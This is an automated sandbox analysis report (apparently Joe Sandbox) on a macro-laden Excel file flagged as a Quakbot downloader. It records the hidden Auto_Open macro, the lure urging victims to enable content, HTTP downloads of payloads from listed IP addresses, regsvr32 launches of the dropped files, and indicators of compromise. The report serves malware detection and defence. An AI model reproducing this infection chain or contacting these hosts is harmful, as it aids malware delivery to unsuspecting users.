Loading ...

Play interactive tourEdit tour

Windows Analysis Report Permission-1984690372-06252021.xlsm

Overview

General Information

Sample Name:Permission-1984690372-06252021.xlsm
Analysis ID:440652
MD5:f9272d851155983c3326ae7bcd99e489
SHA1:caaa6700907da09efc9d7831ec9a0dc636bdbe74
SHA256:80a312be7e3162e80ef38492e7c2160af88e1482fb80ea3370761a0c0654478d
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 244 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 1740 cmdline: regsvr32 ..\Kro.fis MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 3216 cmdline: regsvr32 ..\Kro.fis1 MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4772 cmdline: regsvr32 ..\Kro.fis2 MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 244, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 1740

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
Source: global trafficTCP traffic: 192.168.2.3:49698 -> 190.14.37.3:80
Source: global trafficTCP traffic: 192.168.2.3:49696 -> 185.240.103.219:80
Source: Joe Sandbox ViewIP Address: 190.14.37.3 190.14.37.3
Source: Joe Sandbox ViewIP Address: 185.183.99.120 185.183.99.120
Source: global trafficHTTP traffic detected: GET /44372.7746763889.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.3Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.7746763889.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.120Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: global trafficHTTP traffic detected: GET /44372.7746763889.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.3Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.7746763889.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.120Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the 19 ' yellow bar above. 21 ) :: PROTECTED VIEW Be careful-files from the
Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Screenshot number: 12Screenshot OCR: Enable Content O Sheet1 CD Ready O Type here to search i 1 El a a g xg 191 m m I i '00% ^ E
Source: Document image extraction number: 0Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0Screenshot OCR: Enable Content
Source: Document image extraction number: 1Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Document image extraction number: 1Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Permission-1984690372-06252021.xlsmInitial sample: EXEC
Source: workbook.xmlBinary string: "/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{89C0748D-BB39-4A32-8068-C0C630B753E6}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/><sheet name="Sheet" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Sheet4" sheetId="4" state="hidden" r:id="rId3"/><sheet name="Sheet2" sheetId="3" state="hidden" r:id="rId4"/></sheets><definedNames><definedName hidden="1" name="_xlnm.Auto_Open">Sheet!$G$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Permission-1984690372-06252021.xlsmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{0A3D4497-7E80-4B87-8CF0-583CF63B3AD3} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fisJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis2Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Permission-1984690372-06252021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-1984690372-06252021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-1984690372-06252021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: regsvr32.exe, 00000001.00000002.247639640.0000000000640000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000001.00000002.247639640.0000000000640000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000001.00000002.247639640.0000000000640000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000001.00000002.247639640.0000000000640000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Permission-1984690372-06252021.xlsm4%ReversingLabsDocument-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://190.14.37.3/44372.7746763889.dat0%Avira URL Cloudsafe
http://185.183.99.120/44372.7746763889.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://190.14.37.3/44372.7746763889.datfalse
  • Avira URL Cloud: safe
unknown
http://185.183.99.120/44372.7746763889.datfalse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
190.14.37.3
unknownPanama
52469OffshoreRacksSAPAfalse
185.183.99.120
unknownNetherlands
60117HSAEfalse
185.240.103.219
unknownRussian Federation
57724DDOS-GUARDRUfalse

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:440652
Start date:25.06.2021
Start time:18:34:36
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 53s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Permission-1984690372-06252021.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:Potential for more IOCs and behavior
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.evad.winXLSM@7/7@0/3
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, UsoClient.exe
  • Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
190.14.37.3Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3/44372.7722377315.dat
Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3/44372.7698814815.dat
Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3/44372.7671056713.dat
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3/44372.593127662.dat
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3/44372.5879460648.dat
185.183.99.120Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120/44372.7722377315.dat
Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120/44372.7698814815.dat
Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120/44372.7671056713.dat
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120/44372.593127662.dat
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120/44372.5879460648.dat
185.240.103.219Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 185.240.103.219/44372.593127662.dat
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 185.240.103.219/44372.5879460648.dat

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
DDOS-GUARDRUPermission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 185.240.103.219
Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
  • 185.240.103.219
Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 185.240.103.219
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 185.240.103.219
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 185.240.103.219
Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
  • 5.253.62.174
Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
  • 5.253.62.174
ForceNitro.exeGet hashmaliciousBrowse
  • 185.178.208.135
PO#8076.exeGet hashmaliciousBrowse
  • 185.129.100.112
Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
  • 185.240.103.162
Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
  • 185.240.103.162
jebDtHCePK9feGL.exeGet hashmaliciousBrowse
  • 185.129.100.112
EDS03932,pdf.exeGet hashmaliciousBrowse
  • 185.178.208.160
PO_29_00412.exeGet hashmaliciousBrowse
  • 185.178.208.160
PO_29_00412.exeGet hashmaliciousBrowse
  • 185.178.208.160
12042021493876783,xlsx.exeGet hashmaliciousBrowse
  • 185.178.208.160
Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
  • 5.253.61.31
AxR7BY4wzz.exeGet hashmaliciousBrowse
  • 185.178.208.189
SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
  • 185.178.208.189
#U041e#U0442#U043a#U0440#U044b#U0442#U044c www.sberbank.ru-0152 .htmGet hashmaliciousBrowse
  • 185.129.100.100
OffshoreRacksSAPAPermission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3
Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3
Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 190.14.37.3
4cDyOofgzT.xlsmGet hashmaliciousBrowse
  • 190.14.37.2
4cDyOofgzT.xlsmGet hashmaliciousBrowse
  • 190.14.37.2
341288734918_06172021.xlsmGet hashmaliciousBrowse
  • 190.14.37.2
341288734918_06172021.xlsmGet hashmaliciousBrowse
  • 190.14.37.2
Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
  • 190.14.37.135
Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
  • 190.14.37.135
Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
  • 190.14.37.135
Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
  • 190.14.37.135
Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
  • 190.14.37.135
Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
  • 190.14.37.135
banUwVSwBY.xlsxGet hashmaliciousBrowse
  • 190.14.37.134
banUwVSwBY.xlsxGet hashmaliciousBrowse
  • 190.14.37.134
Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
  • 190.14.37.102
Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
  • 190.14.37.102
DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
  • 190.14.37.121
HSAEPermission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120
Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120
Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120
Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
  • 185.183.99.120
